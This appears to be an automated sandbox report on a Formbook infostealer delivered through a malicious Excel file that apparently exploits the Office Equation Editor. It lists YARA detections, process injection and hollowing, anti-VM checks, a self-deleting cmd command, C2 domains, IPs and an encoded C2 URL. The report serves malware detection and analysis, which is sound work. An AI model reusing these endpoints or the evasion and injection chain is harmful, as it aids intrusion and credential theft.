          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: bin[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/13@4/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$new order.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF6CC.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: new order.xlsxVirustotal: Detection: 30%
          Source: new order.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: new order.xlsxStatic file information: File size 1333760 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
          Source: new order.xlsxInitial sample: OLE indicators vbamacros = False
          Source: new order.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040D06C push ebp; iretd 7_2_0040D06D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C2C2 push FFFFFFF6h; ret 7_2_0041C2D5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415324 push edi; retf 7_2_00415330
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3C5 push eax; ret 7_2_0041B418
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B47C push eax; ret 7_2_0041B482
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B412 push eax; ret 7_2_0041B418
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B41B push eax; ret 7_2_0041B482
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041576D push edx; retf 7_2_004157A0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415770 push edx; retf 7_2_004157A0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415F11 push cs; retf 7_2_00415FD3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415FD6 push cs; retf 7_2_00415FD3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C426E push esp; ret 7_2_008C426F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C1596 push ss; ret 7_2_008C1598
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00846D4B push ecx; retf 7_2_00846D4D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C5F8B push cs; ret 7_2_008C5FB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202DFA1 push ecx; ret 9_2_0202DFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000CD06C push ebp; iretd 9_2_000CD06D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DC2C2 push FFFFFFF6h; ret 9_2_000DC2D5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5324 push edi; retf 9_2_000D5330
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB3C5 push eax; ret 9_2_000DB418
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB41B push eax; ret 9_2_000DB482
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB412 push eax; ret 9_2_000DB418
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB47C push eax; ret 9_2_000DB482
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D576D push edx; retf 9_2_000D57A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5770 push edx; retf 9_2_000D57A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5F11 push cs; retf 9_2_000D5FD3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5FD6 push cs; retf 9_2_000D5FD3
          Source: initial sampleStatic PE information: section name: .text entropy: 7.75944853561
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: new order.xlsxStream path 'EncryptedPackage' entropy: 7.99890686533 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000C85F4 second address: 00000000000C85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000C898E second address: 00000000000C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc 7_2_004088C0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2352Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2580Thread sleep time: -56221s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2524Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 56221Jump to behavior
          Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2217760556.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2211654384.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B30 LdrLoadDll,7_2_00409B30
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h]7_2_009326F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020326F8 mov eax, dword ptr fs:[00000030h]9_2_020326F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.compareionizers.com
          Source: C:\Windows\explorer.exe | Domain query: www.thinking-diversity.com
          Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.globaltradeview.com
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: BE0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 452636 | Sample: new order.xlsx | Startdate: 22/07/2021 | Architecture: WINDOWS | Score: 100
          Top-level DNS/IP: www.legifo.com
          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
          • EXCEL.EXE 34 30 (started)
            - Dropped: C:\Users\user\Desktop\~$new order.xlsx, data
          • EQNEDT32.EXE 12 (started)
            - DNS/IP: 103.155.80.130, 49167, 80 TWIDC-AS-APTWIDCLimitedHK unknown
            - Dropped: C:\Users\user\AppData\Local\...\bin[1].exe, PE32
            - Dropped: C:\Users\Public\vbc.exe, PE32
            - Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          • vbc.exe (started by EQNEDT32.EXE)
            - Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
          • vbc.exe (started by vbc.exe)
            - Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected by vbc.exe)
            - DNS/IP: www.globaltradeview.com 199.59.242.153, 49169, 80 BODIS-NJUS United States; www.thinking-diversity.com; 2 other IPs or domains
            - Signature: System process connects to network (likely due to code injection or exploit)
          • wlanext.exe (started by explorer.exe)
            - Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started by wlanext.exe)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          new order.xlsx | 30% | Virustotal |
          new order.xlsx | 28% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
          C:\Users\Public\vbc.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.globaltradeview.com | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          thinking-diversity.com | 34.102.136.180 | true | false | | unknown
          www.globaltradeview.com | 199.59.242.153 | true | true | | unknown
          www.legifo.com | 52.58.78.16 | true | false | | unknown
          www.thinking-diversity.com | unknown | unknown | true | | unknown
          www.compareionizers.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.thinking-diversity.com/n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== | false | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.ceneo.pl/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.amazon.de/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2225535708.000000000861C000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://sads.myspace.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://search.sify.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://search.ebay.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.nifty.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.google.si/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.google.cz/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
